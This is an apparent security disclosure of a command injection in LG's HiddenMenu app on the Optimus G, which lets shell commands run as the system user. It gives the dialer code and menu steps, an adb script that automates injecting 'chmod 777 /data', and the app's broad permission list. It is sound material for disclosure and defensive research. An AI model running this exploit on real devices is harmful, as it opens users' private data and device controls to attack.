LG Optimus G Command Injection

`Device: LG Optimus G E973 (Others affected)  
Firmware: Android 4.1.2 JZO54k (Others affected)  
Evidence: http://youtu.be/ZfbDIpTY-t4  
  
A vulnerability in LG's "HiddenMenu" allows you to execute shell commands  
as the system, with a large array of additional permissions (Groups). This  
vulnerability opens up the device to further attacks. Due to the large  
number of models sharing similar firmware, I have no idea how many devices  
are affected.  
  
  
Details:  
  
Dial: 3845#*XXX# ( XXX to be replaced with model number, in this case  
3845#*973#)  
  
HiddenMenu will open, select WLAN Test, then select Wi-Fi Ping Test/User  
Command, then select User Command.  
  
Replace the tcpdump command with the command you wish to run as system  
user  
  
Then press cancel (not ok). The application will execute the command as  
system user.  
  
  
Automated version (chmod 777 /data):  
#!/bin/sh  
adb shell ls -l /data  
adb shell input tap 45 1200  
adb shell input tap 700 500  
adb shell input tap 350 800  
adb shell input tap 35 700  
adb shell input tap 350 700  
adb shell input tap 700 1000  
adb shell input tap 35 1000  
adb shell input tap 700 800  
adb shell input tap 35 800  
adb shell input tap 700 500  
adb shell input tap 700 1000  
adb shell input tap 700 900  
adb shell input tap 700 900  
adb shell input tap 700 300  
max=46  
count=1  
while [[ $count -le $max ]]  
do  
adb shell input keyevent 67  
((count++))  
done  
adb shell input text chmod  
adb shell input keyevent 62  
adb shell input text 777  
adb shell input keyevent 62  
adb shell input text "/data"  
adb shell input tap 600 600  
adb shell ls -l /data  
  
  
Additional permissions granted to vulnerable application:  
"android.permission.REBOOT"  
"android.permission.WRITE_EXTERNAL_STORAGE"  
"android.permission.BLUETOOTH"  
"android.permission.BLUETOOTH_ADMIN"  
"android.permission.DEVICE_POWER"  
"android.permission.WRITE_SETTINGS"  
"android.permission.READ_SETTINGS"  
"android.permission.READ_CONTACTS"  
"android.permission.WRITE_CONTACTS"  
"android.permission.HARDWARE_TEST"  
"android.permission.VIBRATE"  
"android.permission.WRITE_APN_SETTINGS"  
"android.permission.ACCESS_WIFI_STATE"  
"android.permission.CHANGE_WIFI_STATE"  
"android.permission.FLASHLIGHT"  
"android.permission.READ_ERS"  
"android.permission.WRITE_ERS"  
"android.permission.MASTER_CLEAR"  
"android.permission.MODIFY_AUDIO_SETTINGS"  
"android.permission.ACCESS_COARSE_LOCATION"  
"android.permission.ACCESS_FINE_LOCATION"  
"android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"  
"android.permission.INTERNET"  
"android.permission.BLUETOOTH"  
"android.permission.BLUETOOTH_ADMIN"  
"com.lge.permission.LGSystemDB_READ"  
"com.lge.permission.LGSystemDB_WRITE"  
"android.permission.MOUNT_UNMOUNT_FILESYSTEMS"  
"android.permission.ACCESS_LGDRM"  
"android.permission.DISABLE_KEYGUARD"  
"android.permission.CAMERA"  
"android.permission.WAKE_LOCK"  
"android.permission.WRITE_SETTINGS"  
"android.permission.VIBRATE"  
"android.permission.ACCESS_FINE_LOCATION"  
"android.permission.WRITE_EXTERNAL_STORAGE"  
"android.permission.CAMERA"  
"android.permission.RECORD_AUDIO"  
"android.permission.DISABLE_KEYGUARD"  
"android.permission.MODIFY_AUDIO_SETTINGS"  
"android.permission.WRITE_SETTINGS"  
"android.permission.WAKE_LOCK"  
"android.permission.SET_TIME"  
"com.android.providers.syncml.permission.READ_SYNCML_PROFILE"  
"com.android.providers.syncml.permission.WRITE_SYNCML_PROFILE"  
"com.lge.permission.FACTORY"  
"com.lge.permission.ACCESS_LGFOTA"  
"android.permission.ACCESS_CACHE_FILESYSTEM"  
"com.lge.permission.WV_PROVISION"  
"com.lge.permission.PR_PROVISION"  
"android.permission.READ_EXTERNAL_STORAGE"  
"android.permission.CHANGE_NETWORK_STATE"  
"com.lge.permission.LGHIDDEN"  
`